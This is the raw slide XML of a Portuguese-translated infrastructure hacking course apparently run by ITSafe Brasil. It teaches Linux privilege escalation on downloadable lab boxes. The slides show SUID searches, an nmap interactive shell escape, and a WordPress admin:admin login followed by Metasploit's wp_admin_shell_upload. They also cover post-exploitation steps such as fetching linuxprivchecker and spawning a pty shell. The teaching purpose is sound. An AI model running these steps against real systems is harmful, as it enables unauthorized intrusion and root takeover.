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  <p:sldMasterId id="2147483688" r:id="rId6"/>
  </p:sldMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="287" r:id="rId7"/>
    <p:sldId id="256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397EC1-5D7A-4B09-8B6E-1F3B5B4C33BE}" v="31" dt="2020-12-10T13:06:30.664"/>
    <p1510:client id="{A1D7946E-3928-41D7-AFE3-01A8A9F6F2F1}" v="36" dt="2020-12-13T08:02:51.037"/>
    <p1510:client id="{CF17FF9E-72F8-4A91-8086-9E98CE6D87CD}" v="4" dt="2020-12-08T11:22:49.983"/>
    <p1510:client id="{D745B793-815C-44BA-8CA7-D75AB71D6C2C}" v="4" dt="2020-12-08T10:56:54.6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1" autoAdjust="0"/>
    <p:restoredTop sz="94660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="81" d="100"/>
          <a:sy n="81" d="100"/>
        </p:scale>
        <p:origin x="970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microsoft.com/office/2015/10/relationships/revisionInfo" Target="revisionInfo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li Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{80397EC1-5D7A-4B09-8B6E-1F3B5B4C33BE}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{80397EC1-5D7A-4B09-8B6E-1F3B5B4C33BE}" dt="2020-12-10T13:06:30.664" v="30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80397EC1-5D7A-4B09-8B6E-1F3B5B4C33BE}" dt="2020-12-10T13:06:29.742" v="28" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4153428859" sldId="283"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{80397EC1-5D7A-4B09-8B6E-1F3B5B4C33BE}" dt="2020-12-10T13:06:29.742" v="28" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4153428859" sldId="283"/>
            <ac:spMk id="7" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{80397EC1-5D7A-4B09-8B6E-1F3B5B4C33BE}" dt="2020-12-10T13:06:24.351" v="25" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="146326741" sldId="284"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{80397EC1-5D7A-4B09-8B6E-1F3B5B4C33BE}" dt="2020-12-10T13:06:24.351" v="25" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="146326741" sldId="284"/>
            <ac:spMk id="7" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{80397EC1-5D7A-4B09-8B6E-1F3B5B4C33BE}" dt="2020-12-10T13:06:21.507" v="22" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="146326741" sldId="284"/>
            <ac:spMk id="9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A1D7946E-3928-41D7-AFE3-01A8A9F6F2F1}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{A1D7946E-3928-41D7-AFE3-01A8A9F6F2F1}" dt="2020-12-13T08:02:51.037" v="35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A1D7946E-3928-41D7-AFE3-01A8A9F6F2F1}" dt="2020-12-13T08:02:51.037" v="34" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3171738652" sldId="286"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{A1D7946E-3928-41D7-AFE3-01A8A9F6F2F1}" dt="2020-12-13T08:02:51.037" v="34" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3171738652" sldId="286"/>
            <ac:spMk id="9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CF17FF9E-72F8-4A91-8086-9E98CE6D87CD}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{CF17FF9E-72F8-4A91-8086-9E98CE6D87CD}" dt="2020-12-08T11:22:49.593" v="2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CF17FF9E-72F8-4A91-8086-9E98CE6D87CD}" dt="2020-12-08T11:22:47.968" v="0" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1723410112" sldId="274"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{CF17FF9E-72F8-4A91-8086-9E98CE6D87CD}" dt="2020-12-08T11:22:47.968" v="0" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1723410112" sldId="274"/>
            <ac:spMk id="7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D745B793-815C-44BA-8CA7-D75AB71D6C2C}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{D745B793-815C-44BA-8CA7-D75AB71D6C2C}" dt="2020-12-08T10:56:52.098" v="2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D745B793-815C-44BA-8CA7-D75AB71D6C2C}" dt="2020-12-08T10:56:51.114" v="0" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1723410112" sldId="274"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{D745B793-815C-44BA-8CA7-D75AB71D6C2C}" dt="2020-12-08T10:56:51.114" v="0" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1723410112" sldId="274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444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4814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231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2698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76" y="0"/>
            <a:ext cx="12197952" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:hlinkClick r:id="rId3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Hacking de Infraestruturas - ITSafe Brasil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Shay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Alfasi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2404412" y="4512734"/>
            <a:ext cx="6858000" cy="13542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Curso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Hacking para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Infraestruturas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Shay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Alfasi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Tradu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ção: Luli Rosenberg &amp; Helton Wernik</a:t>
            </a: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497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3066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06482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9169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22279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9100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484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פריסה מותאמת אישי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70390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5286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3827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9051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41821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0559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76" y="0"/>
            <a:ext cx="12197952" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:hlinkClick r:id="rId3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קורס פייתון בהייטק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Roman Zaikin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29610521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179288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="5333" b="1" u="sng" baseline="0">
                <a:latin typeface="Ariel"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" u="none" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Click to edit title</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" alt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5367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en-US" altLang="ko-KR" sz="37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Widescreen 16:9</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30424743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917E5A-01D3-41F3-8284-1F6F7239A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5707FC0-C90C-4C02-9B97-1E4BA79B84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5FDE0C3-497A-47B4-BF37-AA56CD7CD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E6FC81-753A-49C3-B235-A217CDE9B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35CC900-2C2F-4CEA-B5DA-61A999266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37376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CBCF12-9B48-463C-97F9-5BD0C30AB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C5694B-0FCD-4C78-86B0-D9CC0F8D3E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8069EE0-BB55-4EA9-B378-FC5D95490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238D0C9-949B-42AE-AAB2-39BFD4F6A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6E89EB-73AE-4F76-8163-6C6813A54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85589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5D3CD2-9D3D-4987-8FE4-E5A722DCF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BC4FBC3-7696-423C-9B97-4563F76E6C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41D28FC-ADED-467A-BE3B-86FD87AF8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05D4E78-96A4-47E1-BAB9-118BE23C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C0B9C11-206B-46FE-B876-7B5DDA06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1112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9593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C4102B-72E6-4E79-A6C4-8232ABA01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BCCBD0E-C111-4816-AE7D-A297D1F6F9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10ABFA9-5391-4ABC-9316-6E93ED220F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974D977-AB20-4FDA-AB22-C6D2D001C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91D8221-13BA-4D49-BC14-10166D9E1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45FCFC7-4E88-4E2D-9CE7-9A75795F0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76725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5BA26F-B39F-413E-A344-7535118E8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8F1B58E-72B6-40F7-A4C6-55846C993D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C832C17-C1B5-42F6-96C8-F45EABAC2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20E5EDC-8385-4AA3-B5F8-D2C6A97E0E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9B2157A-F269-4F29-B10F-C6A4BCDE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F041E3F-1212-491B-BA05-8C85F808A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E2E5E90-1442-431A-AAFD-A94357F66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15FD789-D535-47CB-9729-F3F817D43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68220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2C34C6-9B02-40BD-A03D-825F6F86C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CD4E3C9-CE90-489F-B22A-9D915729C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67B968A-4CC7-4756-ABD5-10EBC04E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4354F86-8201-4D05-85BD-EF00A55B4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32877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4153194-4EBC-4A23-8EF1-8986FEFDD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1B7F202-9B3D-4B88-9B3F-E971C26DB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9BFE3A3-F5C9-4E84-9A3B-C0E6B93E6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63837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40A82B-1471-4529-8890-D38B56EA4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CF1275-FB12-41A0-BD01-DB10421D91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0A171C5-86AE-4B8F-935F-E26D3ADD52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D04862D-BFB2-42F0-8F37-F3A515D5E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38E6CE6-2D15-4964-B27A-57B14A782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E8F938F-9873-4F8A-9EA5-F91478B4D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83065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6801EC-BE98-4CAD-A930-016A2A9DF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A1C91DB-E318-4897-954E-384BA5CB2F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0BF177C-E4AC-4E2D-A749-83AA41F8F4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C3E7471-0AA1-4076-B51F-B768D0D28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97A4FD9-5FE1-4482-B855-850442A7E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130E844-8639-46AA-A6FD-B85FE0CF5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15329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D583E8-135D-4074-8603-4E50AA68F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6AF5B6F-458F-4EFC-860E-7310ED130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E071D2-C632-4881-AFDD-C04E7BB0C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73B0B41-0591-4778-891F-596B2A73F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D441228-13DF-45ED-A5D7-434B75EA4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869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7494547-0952-48F5-9B94-100183442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E233B3E-1B2E-4426-BEE9-B288AD6917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F8DD88-1D20-4D20-8255-77CBE10B5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B663B1-3413-44C9-914D-66187DC13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A94D322-073E-496F-93CB-F81F32AFC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2726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6194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951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9013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8577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096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981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hyperlink" Target="http://www.free-powerpoint-templates-design.com/free-powerpoint-templates-design" TargetMode="Externa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47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12/13/2020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rgbClr val="09091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hlinkClick r:id="rId15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H</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="pt-BR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acking de Infraestruturas - ITSafe Brasil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</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="pt-B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hay Alfasi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637" y="5405415"/>
            <a:ext cx="1854364" cy="110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6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88B15AC-D2CB-42ED-BC50-B3D5BE95C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F9A7378-C369-465F-A1B1-3D9CA1D61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CBF803A-FFF9-4120-B507-D2E80382DC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882D2-578D-44C7-8233-A331010C2D79}" type="datetimeFigureOut">
              <a:rPr lang="pt-BR" smtClean="0"/>
              <a:t>13/12/2020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8B51C0C-30E4-4557-8B7F-1595047F7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381594C-7417-4E65-8E45-A27D4C89EC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10A41-62D7-4704-86CA-A2285B42F36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407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1wkfI9cpyjouj6ox_88EqF6tKMtTHIYC1/view?usp=sharing" TargetMode="Externa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bootuser.com/?p=1623" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/" TargetMode="Externa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1a6Dg-bbc2-PeZ2dOULeecS_fdNASgpqe/view?usp=sharing" TargetMode="Externa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ploit-db.com/exploits/8572" TargetMode="Externa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5561923"/>
            <a:ext cx="1219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880" y="1"/>
            <a:ext cx="2219120" cy="131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13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74716" y="2008601"/>
            <a:ext cx="11888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C000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>rwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rwx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2442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SUID – How it looks like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769428" y="3525515"/>
            <a:ext cx="0" cy="801188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-174716" y="4152532"/>
            <a:ext cx="11888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C000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>rwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="8800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rwx</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13026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2185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SUID – How to find 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004942"/>
            <a:ext cx="11888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find / -perm -u=s -type f 2&gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>/null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45" y="2528811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/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>denota iniciar a partir do topo (root) do sistema de arquivos e localizar todos os diretórios.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545" y="2960347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-perm </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> denota pesquisa para as permissões que seguem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/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45" y="3391883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-u=s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>denota a procura de arquivos que são propriedade do usuário root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty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545" y="3761215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-type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>indica o tipo de arquivo que estamos procurando</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty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45" y="4130547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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> denota um arquivo regular, não os diretórios ou arquivos especiais</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/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45" y="4499879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2 &gt; /dev/null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> é um objeto especial do sistema de arquivos que joga fora tudo que está escrito nele</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>já</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vimos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>curso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> de Linux)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="96627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2022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SUID – Exploitation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20049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Search for SUID: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find / -perm -u=s -type f 2&gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/null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3006513"/>
            <a:ext cx="11888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Exploit nmap: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nmap --interactive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!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh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whoami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4993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Sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> Abuse - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>SudoAbuse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> Box - Part 1 Enumeration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1697814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Box Download Link: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https://drive.google.com/file/d/1wkfI9cpyjouj6ox_88EqF6tKMtTHIYC1/view?usp=sharing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528811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Discover Box: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nmap -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 192.168.1.1-100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545" y="31751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Scan All ports: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nmap -P- -A 192.168.1.X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733" y="3821473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Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>nikto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nikto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> -h 192.168.1.82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733" y="4465894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Add Domain name to hosts file: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echo "192.168.1.X </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vtcsec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" &gt;&gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/hosts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="77434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6882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Sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> Abuse - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>SudoAbuse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> Box - Part 2 Exploitation And Post </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Exploation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927673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Default creds wordpress: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admin:admin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3545" y="2851975"/>
            <a:ext cx="11888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Wordpress Metasploit exploit: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 exploit/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>webapp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wp_admin_shell_upload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username admin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password admin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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>targeturi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> /secret/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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 192.168.1.X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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 192.168.1.X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exploit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5337079"/>
            <a:ext cx="11888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Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>linuxprivchecker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wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> [Your </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>linuxprivchecker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Script from kali] (Download to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> folder on remote host)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chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> +x linuxprivchecker.py </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Give execution permissions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./linuxprivchecker.py &gt; PE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> run script output to a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0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6882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Sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> Abuse - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>SudoAbuse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> Box - Part 2 Exploitation And Post </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Exploation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927673"/>
            <a:ext cx="1188828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Create password with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>openssl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openssl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> passwd -1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545" y="2851975"/>
            <a:ext cx="1188828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Swap shell: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python -c 'import </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pty.spawn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("/bin/bash")';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341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5291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Sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> Abuse - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>SudoAbuse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> Box - Word Writable - Part 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927673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Search for writable files and folders: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find / -writable -type f 2&gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/null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find / -writable -type d 2&gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/null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545" y="3128974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Search for executable files and folders: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find / -perm -o=x -type f 2&gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/null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find / -perm -o=x -type d 2&gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/null</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="73871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2432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Enumeration Resources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927673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g0tmi1k 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https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/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3545" y="3128974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rebootuser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> 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https://www.rebootuser.com/?p=1623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45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46577"/>
            <a:ext cx="3641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/>
              <a:t>CronTab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t> - Box2 - Part 1 Enumeration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1697814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Box Download Link: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https://drive.google.com/file/d/1a6Dg-bbc2-PeZ2dOULeecS_fdNASgpqe/view?usp=sharing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545" y="2505728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Discover Box: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nmap -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 192.168.1.1-100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545" y="31751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Scan All ports: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nmap -P- -A 192.168.1.X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45" y="3867639"/>
            <a:ext cx="11888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Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Dirbuster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dirbuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &amp;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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/share/wordlists/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dirbuster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Wordlists for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>dirbuster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733" y="502180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Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>nikto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nikto</a:t>
            </a:r>
            <a:r>
